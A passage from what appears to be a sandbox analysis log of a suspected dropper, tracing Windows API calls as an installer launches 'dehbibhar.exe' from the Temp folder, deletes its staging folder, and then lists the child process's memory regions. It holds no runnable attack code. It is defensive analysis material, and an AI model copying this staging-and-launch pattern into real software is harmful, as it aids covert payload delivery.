nNumerator=100, nDenominator=1427) returned 100 [0303.329] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0303.329] SetFileTime (hFile=0x28, lpCreationTime=0x19f6b8, lpLastAccessTime=0x0, lpLastWriteTime=0x19f6b8) returned 1 [0303.329] CloseHandle (hObject=0x28) returned 1 [0303.330] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0303.331] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0303.331] lstrcpynW (in: lpString1=0x428226, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0303.331] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0303.331] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl" [0303.331] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x426710*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f3d8 | out: lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl", lpProcessInformation=0x19f3d8*(hProcess=0x228, hThread=0x28, dwProcessId=0xfe0, dwThreadId=0x630)) returned 1 [0303.377] CloseHandle (hObject=0x28) returned 1 [0303.377] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0304.373] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0304.374] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0305.115] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0305.115] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0305.998] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0305.998] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0306.512] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0306.512] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0307.104] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0307.104] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0307.999] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0308.000] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0308.247] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0308.365] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0308.531] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0308.531] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0308.788] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0308.788] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0309.010] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0309.010] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0309.225] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0309.225] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0309.370] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0309.370] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0309.546] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0309.546] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0309.721] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0309.722] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0309.891] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0309.891] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0310.053] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0310.053] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0310.209] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0310.210] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0310.328] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0310.328] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0310.530] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0310.530] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0310.740] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0310.740] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0310.902] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0310.902] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0311.058] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0311.058] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0311.181] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0311.182] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0311.300] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0311.300] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0311.602] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0311.603] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0311.746] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0311.765] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x0 [0311.886] GetExitCodeProcess (in: hProcess=0x228, lpExitCode=0x19f3e4 | out: lpExitCode=0x19f3e4*=0x0) returned 1 [0311.887] CloseHandle (hObject=0x228) returned 1 [0311.887] DestroyWindow (hWnd=0x0) returned 0 [0311.887] EndDialog (hDlg=0x4025e, nResult=0x0) returned 1 [0311.908] CloseHandle (hObject=0x210) returned 1 [0311.908] lstrcpynW (in: lpString1=0x425f10, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp" [0311.908] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp") returned 48 [0311.908] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsjd9c8.tmp"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a19ea2, ftCreationTime.dwHighDateTime=0x1d85fcb, ftLastAccessTime.dwLowDateTime=0x2a19ea2, ftLastAccessTime.dwHighDateTime=0x1d85fcb, ftLastWriteTime.dwLowDateTime=0x2a19ea2, ftLastWriteTime.dwHighDateTime=0x1d85fcb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nsjD9C8.tmp", cAlternateFileName="")) returned 0x48e3b0 [0311.909] FindClose (in: hFindFile=0x48e3b0 | out: hFindFile=0x48e3b0) returned 1 [0311.909] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp") returned 48 [0311.909] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0311.909] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2c469d1, ftLastAccessTime.dwHighDateTime=0x1d85fcb, ftLastWriteTime.dwLowDateTime=0x2c469d1, ftLastWriteTime.dwHighDateTime=0x1d85fcb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x48e8f0 [0311.910] FindClose (in: hFindFile=0x48e8f0 | out: hFindFile=0x48e8f0) returned 1 [0311.910] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0311.910] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local") returned 31 [0311.910] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x48e670 [0311.910] FindClose (in: hFindFile=0x48e670 | out: hFindFile=0x48e670) returned 1 [0311.910] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local") returned 31 [0311.910] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData") returned 25 [0311.910] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x48e4f0 [0311.911] FindClose (in: hFindFile=0x48e4f0 | out: hFindFile=0x48e4f0) returned 1 [0311.911] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData") returned 25 [0311.911] lstrlenW (lpString="C:\\Users\\RDHJ0C~1") returned 17 [0311.911] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x48e970 [0311.911] FindClose (in: hFindFile=0x48e970 | out: hFindFile=0x48e970) returned 1 [0311.911] lstrlenW (lpString="C:\\Users\\RDHJ0C~1") returned 17 [0311.912] lstrlenW (lpString="C:\\Users") returned 8 [0311.912] FindFirstFileW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x48e5f0 [0311.912] FindClose (in: hFindFile=0x48e5f0 | out: hFindFile=0x48e5f0) returned 1 [0311.912] lstrlenW (lpString="C:\\Users") returned 8 [0311.912] lstrlenW (lpString="C:") returned 2 [0311.912] lstrlenW (lpString="C:") returned 2 [0311.912] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0311.912] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0311.913] lstrcpynW (in: lpString1=0x425710, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp" [0311.913] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp\\*.*") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp\\*.*" [0311.913] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp\\" [0311.913] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp\\") returned 49 [0311.913] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsjd9c8.tmp\\*.*"), lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a19ea2, ftCreationTime.dwHighDateTime=0x1d85fcb, ftLastAccessTime.dwLowDateTime=0x2a19ea2, ftLastAccessTime.dwHighDateTime=0x1d85fcb, ftLastWriteTime.dwLowDateTime=0x2a19ea2, ftLastWriteTime.dwHighDateTime=0x1d85fcb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75656b08, dwReserved1=0x75656e7e, cFileName=".", cAlternateFileName="")) returned 0x48e5f0 [0311.913] FindNextFileW (in: hFindFile=0x48e5f0, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a19ea2, ftCreationTime.dwHighDateTime=0x1d85fcb, ftLastAccessTime.dwLowDateTime=0x2a19ea2, ftLastAccessTime.dwHighDateTime=0x1d85fcb, ftLastWriteTime.dwLowDateTime=0x2a19ea2, ftLastWriteTime.dwHighDateTime=0x1d85fcb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75656b08, dwReserved1=0x75656e7e, cFileName="..", cAlternateFileName="")) returned 1 [0311.913] FindNextFileW (in: hFindFile=0x48e5f0, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a19ea2, ftCreationTime.dwHighDateTime=0x1d85fcb, ftLastAccessTime.dwLowDateTime=0x2a19ea2, ftLastAccessTime.dwHighDateTime=0x1d85fcb, ftLastWriteTime.dwLowDateTime=0x2a19ea2, ftLastWriteTime.dwHighDateTime=0x1d85fcb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75656b08, dwReserved1=0x75656e7e, cFileName="..", cAlternateFileName="")) returned 0 [0311.913] FindClose (in: hFindFile=0x48e5f0 | out: hFindFile=0x48e5f0) returned 1 [0311.913] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsjd9c8.tmp"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a19ea2, ftCreationTime.dwHighDateTime=0x1d85fcb, ftLastAccessTime.dwLowDateTime=0x2a19ea2, ftLastAccessTime.dwHighDateTime=0x1d85fcb, ftLastWriteTime.dwLowDateTime=0x2a19ea2, ftLastWriteTime.dwHighDateTime=0x1d85fcb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nsjD9C8.tmp", cAlternateFileName="")) returned 0x48e970 [0311.914] FindClose (in: hFindFile=0x48e970 | out: hFindFile=0x48e970) returned 1 [0311.914] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp") returned 48 [0311.914] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp\\" [0311.914] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsjd9c8.tmp")) returned 0x10 [0311.914] SetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp\\", dwFileAttributes=0x10) returned 1 [0311.914] RemoveDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsjD9C8.tmp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsjd9c8.tmp")) returned 1 [0311.915] OleUninitialize () [0311.922] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0xb24 Thread: id = 3 os_tid = 0x60 Thread: id = 4 os_tid = 0xda8 Thread: id = 5 os_tid = 0x4e8 Process: id = "2" image_name = "dehbibhar.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dehbibhar.exe" page_root = "0x429b0000" os_pid = "0xfe0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf00" cmd_line = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 365 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 366 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 367 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 368 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 369 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 370 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 371 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 372 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 373 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 374 start_va = 0x400000 end_va = 0x403fff monitored = 1 entry_point = 0x401000 region_type = mapped_file name = "dehbibhar.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dehbibhar.exe") Region: id = 375 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 376 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 377 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 378 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 379 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 380 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 381 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 382 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 383 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 384 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 385 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 386 start_va = 0x550000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 387 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 388 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 389 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 390 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 391 start_va = 0x410000 end_va = 0x4cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 392 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 